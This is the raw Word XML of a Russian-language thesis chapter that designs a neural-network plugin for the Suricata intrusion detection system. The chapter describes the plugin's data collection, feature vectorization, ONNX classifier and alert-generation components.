    <w:p w14:paraId="3BFDA056" w14:textId="4B57421D" w:rsidR="008E0171" w:rsidRDefault="00B94753" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc230947684"/>
      <w:bookmarkStart w:id="12" w:name="_Toc231673283"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C74587">
        <w:t>Разработка</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C74587">
        <w:t xml:space="preserve"> архитектуры и моделей нейросетевого модуля</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="7F6F5826" w14:textId="515355E8" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc231673284"/>
      <w:r w:rsidRPr="00C74587">
        <w:t>2.1</w:t>
      </w:r>
      <w:r w:rsidR="006605C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C74587">
        <w:t xml:space="preserve">Проектирование архитектуры нейросетевого плагина для интеграции с СОВ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C74587">
        <w:t>Suricata</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D95B279" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ECB1C9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C815C4" w:rsidRDefault="008E0171" w:rsidP="006E752C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C815C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Современные корпоративные сети характеризуются не только ростом объёмов трафика, но и повышением доли зашифрованных каналов, маскирующих каналы утечки конфиденциальной информации. Сигнатурный анализ, являющийся основой СОВ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C815C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C815C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, демонстрирует высокую эффективность при детекции известных атак, однако не позволяет выявлять целевые вторжения, направленные на кражу баз данных, компрометацию учётных записей и длительное присутствие нарушителя в инфраструктуре. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D4029" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C815C4" w:rsidRDefault="008E0171" w:rsidP="006E752C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C815C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Целью проектирования нейросетевого плагина является создание программного модуля, обеспечивающего обнаружение атак на конфиденциальность, целостность и доступность информации за счёт классификации поведенческих характеристик сетевых сессий без необходимости расшифровки защищённых соединений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1343646D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C815C4" w:rsidRDefault="008E0171" w:rsidP="006E752C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C815C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Разрабатываемый плагин позиционируется как исследовательский прототип, предназначенный для проверки гипотезы об эффективности применения нейросетевых методов в задачах обнаружения атак на данные. В отличие от промышленных решений, ориентированных на работу в условиях высоконагруженных сетей в режиме жесткого реального времени, основной задачей прототипа является демонстрация принципиальной возможности выявления скрытых каналов утечки данных и аномалий доступности на основе метаданных трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B706312" w14:textId="7D1B65A4" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="006E752C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ключевые</w:t>
      </w:r>
      <w:r w:rsidR="006E752C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нефункциональные</w:t>
      </w:r>
      <w:r w:rsidR="006E752C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>требования</w:t>
      </w:r>
      <w:r w:rsidR="006E752C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>заключаются</w:t>
      </w:r>
      <w:r w:rsidR="006E752C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="006E752C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обеспечен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ии </w:t>
      </w:r>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">минимального воздействия на производительность системы при сохранении модульности и расширяемости архитектуры, безопасности самого </w:t>
      </w:r>
      <w:r w:rsidR="00487796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>модуля</w:t>
      </w:r>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и единой технологической среды реализации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF90A5" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355CE052" w14:textId="77777777" w:rsidR="00593F1D" w:rsidRDefault="00593F1D" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B3E7E6" w14:textId="3DD2493C" w:rsidR="00593F1D" w:rsidRPr="00593F1D" w:rsidRDefault="00593F1D" w:rsidP="00593F1D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Архитектура разрабатываемого плагина включает четыре основных компонента, каждый из которых выполняет строго определённую функцию:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D46681" w14:textId="168D8184" w:rsidR="00593F1D" w:rsidRPr="00593F1D" w:rsidRDefault="00593F1D" w:rsidP="00593F1D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="28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w:t>
      </w:r>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">одуль сбора данных отвечает за получение потока событий от </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и их первичную обработку. Входными данными служат события в формате EVE JSON, поступающие из файла или через сокет. Модуль выполняет асинхронное чтение и разбор JSON-объектов, после чего передаёт их в блок векторизации. Реализован на языке Python с использованием стандартной библиотеки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D37C2" w14:textId="3699ED94" w:rsidR="00593F1D" w:rsidRPr="00593F1D" w:rsidRDefault="00593F1D" w:rsidP="00593F1D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="28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w:t>
      </w:r>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">лок векторизации преобразует сырые JSON-события в числовые векторы признаков. На вход поступают объекты типов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, из которых извлекаются 15 числовых характеристик сетевого потока. Реализован с использованием библиотек </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pandas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>numpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C00DF9A" w14:textId="7FC72B76" w:rsidR="00593F1D" w:rsidRPr="00593F1D" w:rsidRDefault="00593F1D" w:rsidP="00593F1D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>классификатор принимает вектор признаков и относит его к классу «норма» или «атака», возвращая метку класса и вероятность принадлежности к атакующему трафику. Реализован на основе обученной нейросетевой модели в формате ONNX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200961EA" w14:textId="6F1A348E" w:rsidR="00593F1D" w:rsidRPr="00F719D5" w:rsidRDefault="00593F1D" w:rsidP="00F719D5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">модуль генерации событий формирует структурированное оповещение безопасности на основе результатов классификации и контекста сессии — IP-адресов, портов и временных меток. Выходное событие записывается в формате совместимом с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593F1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BCD2C5" w14:textId="784F94B8" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Все компоненты реализованы на языке Python, что обеспечивает единую технологическую среду, упрощает интеграцию с библиотеками машинного обучения и сокращает время разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EEBEAF" w14:textId="3F07FA58" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлена диаграмма, описывающая архитектуру разрабатываемого </w:t>
      </w:r>
      <w:r w:rsidR="00487796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>плагина</w:t>
      </w:r>
      <w:r w:rsidRPr="00287C4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и взаимодействие его компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501627B9" w14:textId="25F7AFE2" w:rsidR="008E0171" w:rsidRDefault="00F719D5" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>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A2347DF" wp14:editId="37F0D969">
            <wp:extent cx="5782075" cy="5876925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="83339653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96532" name="Рисунок 833396532"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="4807" t="2348" r="4850" b="10927"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5782075" cy="5876925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE1DD3" w14:textId="4A548C6E" w:rsidR="00F719D5" w:rsidRDefault="00F719D5" w:rsidP="00F719D5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>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D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
